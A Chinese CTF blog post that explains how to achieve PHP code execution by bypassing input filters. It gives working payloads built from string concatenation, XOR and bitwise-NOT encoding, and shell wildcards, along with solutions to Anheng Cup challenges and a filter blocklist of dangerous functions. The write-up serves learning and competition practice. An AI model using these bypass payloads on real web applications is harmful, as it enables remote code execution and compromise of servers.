<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>绕过过滤getshell的一些骚操作 | Iuhrey的幻想乡</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言最近忙着一些社团的杂事，学习进度一度停滞不前….不知怎么见着其他人的技术越来越高，心中有了一丝无奈以及失望，不知道还能坚持多久下去，咸鱼总是停于安逸之处，强者总能一直前进不止。借着安恒的题目归纳一下绕过限制getshell的几种策略。 getshell前置内容在之前的文章讲过了getshell的一些基本内容，重复内容就不讲解了。一般我们通过一些函数来传入命令参数，再通过解析将命令执行最终输出我">
<meta name="keywords" content="Getshell">
<meta property="og:type" content="article">
<meta property="og:title" content="绕过过滤getshell的一些骚操作">
<meta property="og:url" content="http://yoursite.com/2018/09/27/绕过过滤getshell的一些骚操作/index.html">
<meta property="og:site_name" content="Iuhrey的幻想乡">
<meta property="og:description" content="前言最近忙着一些社团的杂事，学习进度一度停滞不前….不知怎么见着其他人的技术越来越高，心中有了一丝无奈以及失望，不知道还能坚持多久下去，咸鱼总是停于安逸之处，强者总能一直前进不止。借着安恒的题目归纳一下绕过限制getshell的几种策略。 getshell前置内容在之前的文章讲过了getshell的一些基本内容，重复内容就不讲解了。一般我们通过一些函数来传入命令参数，再通过解析将命令执行最终输出我">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2018-09-29T14:24:34.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="绕过过滤getshell的一些骚操作">
<meta name="twitter:description" content="前言最近忙着一些社团的杂事，学习进度一度停滞不前….不知怎么见着其他人的技术越来越高，心中有了一丝无奈以及失望，不知道还能坚持多久下去，咸鱼总是停于安逸之处，强者总能一直前进不止。借着安恒的题目归纳一下绕过限制getshell的几种策略。 getshell前置内容在之前的文章讲过了getshell的一些基本内容，重复内容就不讲解了。一般我们通过一些函数来传入命令参数，再通过解析将命令执行最终输出我">
  
    <link rel="alternate" href="/atom.xml" title="Iuhrey的幻想乡" type="application/atom+xml">
  
  
    <link rel="icon" href="source/images/favicon.ico">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/plugin/bganimation/bg.css">
  

</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="/images/avatar.jpg">
    <h2 class="author">Iuhrey</h2>
    <h3 class="description">一个常年被吊打的Web手    一个唱歌不好指弹垃圾的吉他手</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>27</strong><br>文章</div></a>
      <a href="/categories"><div><strong>2</strong><br>分类</div></a>
      <a href="/tags"><div><strong>12</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>幻想乡的起点</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>幻想乡图</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分岔路</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>路标</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-绕过过滤getshell的一些骚操作" class="wow slideInRight article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/09/27/绕过过滤getshell的一些骚操作/" class="article-date">
  <time class="post-time" datetime="2018-09-27T07:58:05.000Z" itemprop="datePublished">
    <span class="post-month">9月</span><br>
    <span class="post-day">27</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      绕过过滤getshell的一些骚操作
    </h1>
  

        <div>
          
  <div class="article-category">
    <a class="article-category-link" href="/categories/日常学习/">日常学习</a>
  </div>

          
              

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近忙着一些社团的杂事，学习进度一度停滞不前….不知怎么见着其他人的技术越来越高，心中有了一丝无奈以及失望，不知道还能坚持多久下去，咸鱼总是停于安逸之处，强者总能一直前进不止。<br>借着安恒的题目归纳一下绕过限制getshell的几种策略。</p>
<h2 id="getshell前置内容"><a href="#getshell前置内容" class="headerlink" title="getshell前置内容"></a>getshell前置内容</h2><p>在之前的文章讲过了getshell的一些基本内容，重复内容就不讲解了。一般我们通过一些函数来传入命令参数，再通过解析将命令执行最终输出我们想要的结果，具体说一下这些函数的特点:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">assert():检查一个断言是否为 FALSE，如果是 FALSE 则返回 FALSE，否则是 TRUE。但是这并不是它被利用的原因，在传入一个字符串后，这个字符串会被当做PHP代码来执行，比如我们常用的phpinfo()，file_put_content()等等都能执行。值得注意的是这里不仅仅可以传入字符串，也能传入函数。</span><br><span class="line">eval():把字符串按照 PHP 代码来计算，和上者类似，但是eval()只能传入字符串。</span><br><span class="line">system():执行外部程序，并且显示输出。执行命令把结果返回。  </span><br><span class="line">exec():执行命令，如果带有参数，会将结果返回。</span><br></pre></td></tr></table></figure></p>
<p>然后就是要认识一些基础的linux或者windows下的命令了，具体可以自行百度，后续用到的命令也会粗略提及。  </p>
<h2 id="函数被过滤"><a href="#函数被过滤" class="headerlink" title="函数被过滤"></a>函数被过滤</h2><p>一般来说，网站会通过过滤shell里常用的一些函数来防止被攻击，常见的过滤手段如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">$iarok[] = str_ireplace(array(&apos;unlink&apos;,&apos;opendir&apos;,&apos;mysqli_&apos;,&apos;mysql_&apos;,&apos;socket_&apos;,&apos;curl_&apos;,&apos;base64_&apos;,&apos;putenv&apos;,&apos;popen(&apos;,&apos;phpinfo&apos;,&apos;pfsockopen&apos;,&apos;proc_&apos;,&apos;preg_&apos;,&apos;_GET&apos;,&apos;_POST&apos;,&apos;_COOKIE&apos;,&apos;_REQUEST&apos;,&apos;_SESSION&apos;,&apos;_SERVER&apos;,&apos;assert&apos;,&apos;eval(&apos;,&apos;file_&apos;,&apos;passthru(&apos;,&apos;exec(&apos;,&apos;system(&apos;,&apos;shell_&apos;), &apos;@.@&apos;, $v);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>通过将命令执行函数或者一些危险的存在利用点的函数全部用无效符号替换。这种过滤的绕过方式有大致几种，第一种就是通过字符串拼接来绕过，其余可以通过大小写绕过，或者双写绕过，这里的方式可以参考之前XSS过滤的方式。  </p>
<h3 id="参考示例"><a href="#参考示例" class="headerlink" title="参考示例"></a>参考示例</h3><p>最近接触到的应该是安恒杯9月web1，web1通过利用之前seacms爆出的漏洞而改的，具体示例可以参考seacms最新后台getshell的文章:<a href="https://www.anquanke.com/post/id/153402。" target="_blank" rel="noopener">https://www.anquanke.com/post/id/153402。</a><br>在过滤了_GET，_POST以及cookie传参的途径下，通过字符拼接成功构造了payload。参考如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$GLOBALS[&quot;_G&quot;.&quot;ET&quot;][$a]($GLOBALS[&quot;_G&quot;.&quot;ET&quot;][$b]);</span><br></pre></td></tr></table></figure></p>
<p>我们传入a=system&amp;b=ls，就形成了system(“ls”);，ls命令成功执行最后返回结果。  </p>
<h2 id="数字和字母被过滤"><a href="#数字和字母被过滤" class="headerlink" title="数字和字母被过滤"></a>数字和字母被过滤</h2><p>这个比上面那个过滤稍微狠一点，拼接字符串是不太可能实现了，具体过滤实现代码如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(!preg_match(&apos;/[a-z0-9]/is&apos;,$_GET[&apos;shell&apos;])) &#123;</span><br><span class="line">  eval($_GET[&apos;shell&apos;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<h3 id="异或"><a href="#异或" class="headerlink" title="异或"></a>异或</h3><p>虽然过滤了数字和字符，但是这并不意味着就没办法构造出字符和数字了，异或以及反取符号都在的情况下，可以通过不可见字符转换为字母，比如以下的几个例子:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&apos;a&apos; = &apos;=&apos; ^ &apos;\\&apos;</span><br><span class="line">&apos;e&apos; = &apos;@&apos; ^ &apos;%&apos;</span><br><span class="line">&apos;r&apos; = &apos;.&apos; ^ &apos;\\&apos;</span><br><span class="line">&apos;t&apos; = &apos;(&apos; ^ &apos;\\&apos;</span><br><span class="line">&apos;s&apos; = &apos;/&apos; ^ &apos;\\&apos;</span><br><span class="line">&apos;m&apos; = &apos;-&apos; ^ &apos;@&apos;</span><br><span class="line">&apos;y&apos; = &apos;&amp;&apos; ^ &apos;_&apos;</span><br><span class="line">&apos;E&apos; = &apos;&gt;&apos; ^ &apos;&#123;&apos;</span><br><span class="line">&apos;G&apos; = &apos;&lt;&apos; ^ &apos;&#123;&apos;</span><br><span class="line">&apos;O&apos; = &apos;/&apos; ^ &apos;`&apos;</span><br><span class="line">&apos;P&apos; = &apos;+&apos; ^ &apos;&#123;&apos;</span><br><span class="line">&apos;S&apos; = &apos;(&apos; ^ &apos;&#123;&apos;</span><br><span class="line">&apos;T&apos; = &apos;/&apos; ^ &apos;&#123;&apos;</span><br></pre></td></tr></table></figure></p>
<p>这些是我测试出来可以构造payload的操作，可以直接拿来用。例如构造以下payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?code=$_=&quot;_&quot;.(&apos;&lt;&apos; ^ &apos;&#123;&apos;).(&apos;&gt;&apos; ^ &apos;&#123;&apos;).(&apos;/&apos; ^ &apos;&#123;&apos;);  //$_=&quot;_GET&quot;</span><br><span class="line">$&#123;$_&#125;[_]($&#123;$_&#125;[__]);  //$_GET[_]($_GET[__])</span><br><span class="line">&amp;_=(&apos;/&apos; ^ &apos;\\&apos;).(&apos;&amp;&apos; ^ &apos;_&apos;).(&apos;/&apos; ^ &apos;\\&apos;).(&apos;(&apos; ^ &apos;\\&apos;).(&apos;@&apos; ^ &apos;%&apos;).(&apos;-&apos; ^ &apos;@&apos;)  //system($_GET[__])</span><br></pre></td></tr></table></figure></p>
<p>接着传入命令就行了。<br><strong>值得注意的是，不仅仅可以用其他可见字符，不可见字符经过url编码进行异或也是可以实现的。</strong></p>
<h3 id="取反-参考了p神的文章"><a href="#取反-参考了p神的文章" class="headerlink" title="取反(参考了p神的文章)"></a>取反(参考了p神的文章)</h3><p>和上一种方法类似的是取反，例如\x9e取反之后就成了a，各个字符如何通过取反得到可以去测试一下，如下是构造的payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?code=$&#123;~&quot;\xA0\xB8\xBA\xAB&quot;&#125;[_]($&#123;~&quot;\xA0\xB8\xBA\xAB&quot;&#125;[__]); //$_GET[_]($_GET[__])</span><br><span class="line">&amp;_=&#123;~&quot;\x8c\x86\x8c\x8b\x9a\x92&#125;  //system</span><br><span class="line">&amp;__=&#123;~&quot;\x93\x8c&quot;&#125; //ls</span><br></pre></td></tr></table></figure></p>
<p>此外可以参考p神写的这个payload,他利用了utf8汉字编码提取出类似的编码进行取反:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$__=(&apos;&gt;&apos;&gt;&apos;&lt;&apos;)+(&apos;&gt;&apos;&gt;&apos;&lt;&apos;);</span><br><span class="line">$_=$__/$__;</span><br><span class="line"></span><br><span class="line">$____=&apos;&apos;;</span><br><span class="line">$___=&quot;瞰&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;和&quot;;$____.=~($___&#123;$__&#125;);$___=&quot;和&quot;;$____.=~($___&#123;$__&#125;);$___=&quot;的&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;半&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;始&quot;;$____.=~($___&#123;$__&#125;);</span><br><span class="line"></span><br><span class="line">$_____=&apos;_&apos;;$___=&quot;俯&quot;;$_____.=~($___&#123;$__&#125;);$___=&quot;瞰&quot;;$_____.=~($___&#123;$__&#125;);$___=&quot;次&quot;;$_____.=~($___&#123;$_&#125;);$___=&quot;站&quot;;$_____.=~($___&#123;$_&#125;);</span><br><span class="line"></span><br><span class="line">$_=$$_____;</span><br><span class="line">$____($_[$__]);</span><br></pre></td></tr></table></figure></p>
<p><strong>还有一种也是p神想出来的方法，具体操作可以参考他的这篇文章<a href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html</a></strong></p>
<h3 id="参考示例-1"><a href="#参考示例-1" class="headerlink" title="参考示例"></a>参考示例</h3><p>这是一道代码审计的题目:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &apos;flag.php&apos;;</span><br><span class="line">if(isset($_GET[&apos;code&apos;]))&#123;</span><br><span class="line">    $code = $_GET[&apos;code&apos;];</span><br><span class="line">    if(strlen($code)&gt;40)&#123;</span><br><span class="line">        die(&quot;Long.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    if(preg_match(&quot;/[A-Za-z0-9]+/&quot;,$code))&#123;</span><br><span class="line">        die(&quot;NO.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    @eval($code);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">//$hint = &quot;php function getFlag() to get flag&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>让我们不使用字母以及数字来执行getFlag()这个函数，这里就可以参考上面的payload来进行绕过了，payload如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=$_=&quot;`&#123;&#123;&#123;&quot; ^ &quot;?&lt;&gt;/&quot;;$&#123;$_&#125;[_]();&amp;_=getFlag</span><br></pre></td></tr></table></figure></p>
<p><strong>PS:`代表执行命令，?匹配字符，所以形成_GET字符</strong></p>
<h2 id="数字，字母，-以及-被过滤"><a href="#数字，字母，-以及-被过滤" class="headerlink" title="数字，字母，$以及_被过滤"></a>数字，字母，$以及_被过滤</h2><p>这个就比上一个再更加狠一点了，因为我们所要的$被过滤了，也就是说我们无法构造变量了，这里用到了一个很冷门的知识:<strong>?&gt;&lt;?=是可以直接输出后面的代码的</strong>(具体原理参考大师傅们的解释)，以及?是通配符这个知识。例如我们使用/???/???可以匹配/bin/cat这个命令。</p>
<h3 id="参考示例-2"><a href="#参考示例-2" class="headerlink" title="参考示例"></a>参考示例</h3><p>这是安恒杯web2的一部分题目:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &apos;flag.php&apos;;</span><br><span class="line">if(isset($_GET[&apos;code&apos;]))&#123;</span><br><span class="line">    $code = $_GET[&apos;code&apos;];</span><br><span class="line">    if(strlen($code)&gt;35)&#123;</span><br><span class="line">        die(&quot;Long.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    if(preg_match(&quot;/[A-Za-z0-9_$]+/&quot;,$code))&#123;</span><br><span class="line">        die(&quot;NO.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    @eval($code);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>再通过操作得出有/flag的前提下，我们可以使用上面的知识，生成以下payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=?&gt;&lt;?=`/???/??? /????`;?&gt;</span><br></pre></td></tr></table></figure></p>
<h2 id="字符长度限制"><a href="#字符长度限制" class="headerlink" title="字符长度限制"></a>字符长度限制</h2><p>这就要结合某次丧心病狂的比赛了，里面都是命令执行，这部分在后续会详细写出来……..</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/09/27/绕过过滤getshell的一些骚操作/" data-id="cjp16rh6q001tbkvjwob21h0v" class="article-share-link">分享</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Getshell/">Getshell</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/10/08/关于命令执行的学习/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">
        
          关于命令执行的初步学习
        
      </div>
    </a>
  
  
    <a href="/2018/08/16/solve-me-后续/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">solve me 后续</div>
    </a>
  
</nav>

  
</article>




  <div id="comments" class="comments">
    <div id="uyan_frame"></div>
  </div>
<script type="text/javascript" src="http://v2.uyan.cc/code/uyan.js?uid=2158764"></script>
</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">Iuhrey的幻想乡</h1>
    <h2 class="blog-subtitle">记录日常所学</h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>幻想乡的起点</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>幻想乡图</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分岔路</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>路标</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="/images/avatar.jpg">
    <h2 class="author">Iuhrey</h2>
    <h3 class="description">一个常年被吊打的Web手    一个唱歌不好指弹垃圾的吉他手</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>27</strong><br>文章</div></a>
      <a href="/categories"><div><strong>2</strong><br>分类</div></a>
      <a href="/tags"><div><strong>12</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="http://github.com/NoneGirlIuh" target="_blank" title="Github">
          Github
        </a>
      
    </div>

    <div class="friend-link">
      <h2>友情链接</h2>
      
        <a class="hvr-bounce-in" href="http://blog.shanamaid.top/" target="_blank" title="ShanaMaid">
          ShanaMaid
        </a>
      
        <a class="hvr-bounce-in" href="http://mozhucy.cn/" target="_blank" title="喜欢啥几把BB的狗骑驴">
          喜欢啥几把BB的狗骑驴
        </a>
      
        <a class="hvr-bounce-in" href="http://alittlexyz.cn/" target="_blank" title="喜欢gay在狗骑驴旁边的狗逼">
          喜欢gay在狗骑驴旁边的狗逼
        </a>
      
        <a class="hvr-bounce-in" href="http://zaiyewujiang.cn/" target="_blank" title="gay里gay气的大黄">
          gay里gay气的大黄
        </a>
      
        <a class="hvr-bounce-in" href="http://yulige.top/" target="_blank" title="郁离歌大手子的博客">
          郁离歌大手子的博客
        </a>
      
        <a class="hvr-bounce-in" href="http://shaobaobaoer.cn/" target="_blank" title="有很多小姐姐的烧包包">
          有很多小姐姐的烧包包
        </a>
      
    </div>
  </div>
</div>

  
</aside>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="//music.163.com/outchain/player?type=2&id=478384&auto=1&height=66"></iframe>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2017 - 2018 Iuhrey<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a href="https://github.com/ShanaMaid/hexo-theme-shana">Shana</a>
      
        |<script src="http://s11.cnzz.com/z_stat.php?id=1273056144&web_id=1273056144" language="JavaScript"></script>
      
    </div>
<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <span id="busuanzi_container_site_uv">本站总访问量<span id="busuanzi_value_site_uv"></span>次</span>
  </div>
</footer>
    </div>
    

<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  <link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">
  <script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>



  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>
<script src="/js/script.js"></script>



  </div>
</body>
</html>